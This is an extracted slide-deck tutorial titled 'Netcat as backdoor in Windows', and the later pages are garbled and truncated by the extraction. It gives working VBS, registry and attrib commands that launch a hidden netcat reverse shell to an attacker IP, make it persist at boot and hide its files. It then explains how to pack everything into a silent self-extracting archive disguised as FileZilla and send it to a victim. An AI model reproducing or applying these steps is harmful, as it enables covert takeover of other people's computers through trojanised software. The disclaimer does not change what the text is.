netcat by knight crawler
TRANSCRIPT
8/8/2019 Netcat by Knight Crawler
http://slidepdf.com/reader/full/netcat-by-knight-crawler 1/9
Netcat as backdoor in Microsoft Windows
by
KnightCrawler
Thankx to Auditorsec and Ne011
for their time and support
8/8/2019 Netcat by Knight Crawler
http://slidepdf.com/reader/full/netcat-by-knight-crawler 2/9
1 Netcat as backdoor in Windows| KnightCrawler
Objective:
To use Netcat as a backdoor in Microsoft Windows.
Tools required:
Netcat
Download link: http://securityoverride.com/infusions/pro_download_panel/download.php?did=10
Resource Hacker
Download link: http://en.kioskea.net/download/download-1536-reshack
WinRAR
Download Link: http://www.rarlab.com/download.htm
Note:
For this purpose I m using a bridged VirtualBox. You can try it there or in a real network.
I m using Windows XP Professional SP2.
Attacking machine:
Name: xp-attacker
Internal IP: 192.168.1.2
Victim machine:
Name: xp-victim
Internal IP: 192.168.1.3
DO NOT USE IT FOR DESTRUCTION PURPOSE BECAUSE WE ARE HERE TO LEARN.
THE AUTHOR TAKES NO RESPONSIBILITY OF ANY DAMAGE TO ANYONE OR ANYTHING.
8/8/2019 Netcat by Knight Crawler
http://slidepdf.com/reader/full/netcat-by-knight-crawler 3/9
2 Netcat as backdoor in Windows| KnightCrawler
Step 1:
Download the files and save them in the attacking machine.
Step 2:
Open notepad and make a .vbs file that will run our Netcat when the victim powers on his computer.
Save this file as anyname.vbs
I have saved this file as file.vbs
Contents of the vbs file:
Const HIDDEN_WINDOW = 1
strComputer = "."
Set objStartup = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_ProcessStartup")
Set objProcess = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
errReturn = objProcess.Create("C:\windows\system32\nc.exe -d -e cmd.exe 192.168.1.2 4444", null,
objConfig, intProcessID)
C:\windows\system32\ Path where netcat file (nc.exe) is present & is to
be run.
192.168.1.2 Internal IP Address of the attacker
4444 Open port in attacker.
Step 3:
Now add a value in windows Registry so that file.vbs runs every time the system boots up.
For this open notepad and make a .cmd file that will add the required value to the registry.
Save this file as anyname.cmd
I have saved this file as addreg.cmd
8/8/2019 Netcat by Knight Crawler
http://slidepdf.com/reader/full/netcat-by-knight-crawler 4/9
3 Netcat as backdoor in Windows| KnightCrawler
Contents of the cmd file:
reg add HKLM\software\microsoft\windows\currentversion\run /f /v nc /d
C:\windows\system32\file.vbs
HKLM\software\microsoft\windows\currentversion\run Location in registry
/f Forces the entry to add in registry
/v nc Sets name of the entry
/d C:\windows\system32\file.vbs Sets the value of the entry
Step 4:
Now we create another .cmd file to run: nc.exe, file.vbs, addreg.cmd
And also to set the file attributes.
For this open notepad and make a .cmd file.
Save this file as anyname.cmd
I have saved this file as run.cmd
Contents of the cmd file:
attrib +s +h C:\windows\system32\nc.exe
attrib +s +h C:\windows \system32\file.vbs
attrib +s +h C:\windows \system32\addreg.cmd
attrib +s +h C:\windows \system32\run.cmd
file.vbs
addreg.cmd
attrib To set file attributes
+s Mark the file as system file
+h Mark the file as hidden
C:\windows\system32\ Location of the files
file.vbs Run this file
addreg.cmd Run this file
8/8/2019 Netcat by Knight Crawler
http://slidepdf.com/reader/full/netcat-by-knight-crawler 5/9
4 Netcat as backdoor in
Step 5:
Now we have to create our final
For this add all the files:
nc.exe, file.vbs, addreg.cmd, run
to the archive as shown below
Save this file as anyname.exe
Select Create SFX archive and L
I m using the name FileZilla.exe
Windows| KnightCrawler
file that will be run on the victim’s computer.
.cmd
ck archive
because I will be using its icon later on.
8/8/2019 Netcat by Knight Crawler
http://slidepdf.com/reader/full/netcat-by-knight-crawler 6/9
5 Netcat as backdoor in
Now select SFX options from th
Now set Path to extract and Ru
Windows| KnightCrawler
Advanced tab.
after extraction in the General tab.
8/8/2019 Netcat by Knight Crawler
http://slidepdf.com/reader/full/netcat-by-knight-crawler 7/9
6 Netcat as backdoor in
Set the Silent mode to Hide all i
Set Update mode to Extract an
tab.
Windows| KnightCrawler
n the Modes tab.
replace files and Overwrite mode to Overwrit all files in Update
8/8/2019 Netcat by Knight Crawler
http://slidepdf.com/reader/full/netcat-by-knight-crawler 8/9
7 Netcat as backdoor in
Press Ok twice and you will hav
Step 6:
Now we have to change its icon
For this we use Resource Hacker
Open resource hacker and then
Select icon group and there sele
Now click Open file with new ic
Now we have replaced the icon.
Save the file with a new name I
Step 7:
Send this file FileZilla.exe to the
Open netcat and run the followi
Nc –Lvp 444
Windows| KnightCrawler
your file FileZilla.exe
to attract the victim to open it.
.
open your file FileZilla.exe
ct the value, right-click on it and click Replace re
n. Then select the icon of your choice and click
hoose FileZilla.exe only and replaced the old fil
victim.
ng command.
source
Replace.
with it.
8/8/2019 Netcat by Knight Crawler
http://slidepdf.com/reader/full/netcat-by-knight-crawler 9/9
8 Netcat as backdoor in
Step 8:
When the file FileZilla.exe is exe
control of the victim’s computer
The attacker’s screen will look s
Step 9:
And you are done☺
It is requested that you play saf
Windows| KnightCrawler
cuted in the victim’s computer then the attacke
.
mething like this:
and don’t create havoc with this.
will get remote